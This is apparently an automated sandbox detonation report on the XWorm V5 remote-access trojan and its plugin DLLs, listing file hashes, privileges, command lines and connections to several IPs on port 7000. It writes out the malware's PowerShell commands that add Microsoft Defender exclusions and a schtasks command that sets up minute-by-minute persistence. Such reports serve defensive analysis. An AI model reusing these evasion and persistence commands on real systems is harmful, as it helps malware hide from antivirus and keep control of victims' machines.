SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9fceaa8f38c649b2e22774fae18c3a57
SHA1 5fd53df1613ba5450c0b8efd46825db0d9b524e3
SHA256 fd1439be9ac2c7e9657901542c04521cea486ac10ba40144cfd20183b18e51c5
SHA512 45846475ef49c7fe0b7ccca1c18404f963f689c73ff4bd29add0fc49ce3872bceb230d5a45782731c4161888d853671253231c23e13b05b0739a4b835ff0c52a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3d322957de701543c90b1c8b89373e4
SHA1 a0b01c5a62ce870a0f47c84b8b17163f78381a98
SHA256 50883bb875b776b2a842534db9894062722d673295c0a4953658c22fea4bb115
SHA512 c10b0b7921e33563a09a91e5454f17ef4ea400d99166a794777e72511982c3a5ab5d151f12ca11236ede80178092013a0530aa087edf96ca28048b023364d35d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 776a20f3587407be69af7831b866672b
SHA1 a466678bb9d08542b5be78a99e4279718f7fc765
SHA256 105f1c018e73967fd2a0fc4fc901000b99bebc11caf63d63611c6e86523f0fcd
SHA512 ce00e2e7d524cd8f32d8d5ed373fadc4889af22d5e570db83793c9cacc31c9947fccb4fbad26c1edfc22fb5d0ef8d49bfe7941dc4eeccad9faf03a7e2427c764

memory/200-227-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

memory/200-228-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\q11111.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

Analysis: behavioral10

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:47

Platform

win10-20240404-en

Max time kernel

590s

Max time network

592s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\XWorm V5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2" C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm V5.2'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWorm V5" /tr "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
AE 86.96.100.98:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
SA 31.167.24.129:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
SA 31.167.24.129:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
SA 31.167.24.129:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp

Files

memory/3300-0-0x0000000000580000-0x00000000005B4000-memory.dmp

memory/3300-1-0x00007FF9DEE70000-0x00007FF9DF04B000-memory.dmp

memory/3300-2-0x00007FF9DEE70000-0x00007FF9DF04B000-memory.dmp

memory/4008-7-0x00007FF9DEE70000-0x00007FF9DF04B000-memory.dmp

memory/4008-8-0x00007FF9DEE70000-0x00007FF9DF04B000-memory.dmp

memory/4008-9-0x00007FF9DEE70000-0x00007FF9DF04B000-memory.dmp

memory/4008-10-0x000001994ED40000-0x000001994ED62000-memory.dmp

memory/4008-13-0x000001994EEF0000-0x000001994EF66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_byfme153.vl4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4008-51-0x00007FF9DEE70000-0x00007FF9DF04B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d18082d5cad13fb4e2dab9055f5932c9
SHA1 e8d272fa5c3932fd4eb870b64aec74f9fc9a2c83
SHA256 2efb7a8cd62d33253c9b3fe1f3b0628035c3f51bfd20562c062ea431e1907f87
SHA512 d6cf597fc228901fb4d5bd641e17d5f6e78db3e60c66d48944e58ee67fe102cb461f2c336cff147c686c662cdaae383b1346e73980bddb1c1ea899a922d99827

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3bfe8091fd58b3483c28deb660a40dc
SHA1 7237797b0add79e2f63648676a0e102051dd6a40
SHA256 3143f3366e793db7e595c39b11ed175bbbd3762fc504e588e6994651f04f90da
SHA512 8a136989efad3904b8333569c48d17f8395ffe685ea76617119180555f36f9d0d69956e8fe7d424e8bc464f059f053c9db727a600a2be7935cbed2a7f6c2f898

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 626347883f33e4c32cabf737a5688750
SHA1 6d734d01dc996dc41c0ca0e5119b928caec142ec
SHA256 b465e011749349ae81ff35f714b52e6b67cd1b88b5dc7a19477b721cf44390b4
SHA512 d7092ecc2a1412844a3d2d3c1cb57271ecdc305e0a38be6d26a99a96995bc3aca6eea482d438d9311166e7254fb2defe25bcea6f3e8f02fb681c80d4680a46f8

memory/3300-184-0x00007FF9DEE70000-0x00007FF9DF04B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

MD5 b2234a1b2a6b4b0e9bfbeeb540e86725
SHA1 d1e45aa8f1136a8809837ad72943dc7e580767e1
SHA256 d1ee800872c14d799d38ab0fb08b1d3c6573cef795f8c3eb9e3066e106e3dabb
SHA512 946eebfb60ea5081f59e9f31a56097564cc52e2b688b77d37eecbca3519e1122c872c98a129f27dc86a4032ef18ca4a98f1ddbdd283076e2e880d17bf63149f5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWorm V5.2.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

Analysis: behavioral25

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:57

Platform

win10-20240404-en

Max time kernel

314s

Max time network

385s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\Clipboard.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\Clipboard.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 09:00

Platform

win10-20240404-en

Max time kernel

509s

Max time network

512s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\FileSeacher.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\FileSeacher.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 09:03

Platform

win10-20240404-en

Max time kernel

315s

Max time network

379s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\HVNC.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\HVNC.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:39

Platform

win10-20240404-en

Max time kernel

516s

Max time network

520s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:55

Platform

win10-20240611-en

Max time kernel

311s

Max time network

394s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Iced.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Iced.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:56

Platform

win10-20240404-en

Max time kernel

314s

Max time network

398s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Utils.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Utils.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 f.f.f.f.9.d.a.0.2.d.e.b.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 09:00

Platform

win10-20240611-en

Max time kernel

380s

Max time network

433s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\HBrowser.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\HBrowser.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 40.58.20.217.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:39

Platform

win10-20240404-en

Max time kernel

314s

Max time network

406s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:47

Platform

win10-20240404-en

Max time kernel

517s

Max time network

520s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:58

Platform

win10-20240404-en

Max time kernel

313s

Max time network

386s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\Cmstp-Bypass.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\Cmstp-Bypass.dll,#1

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A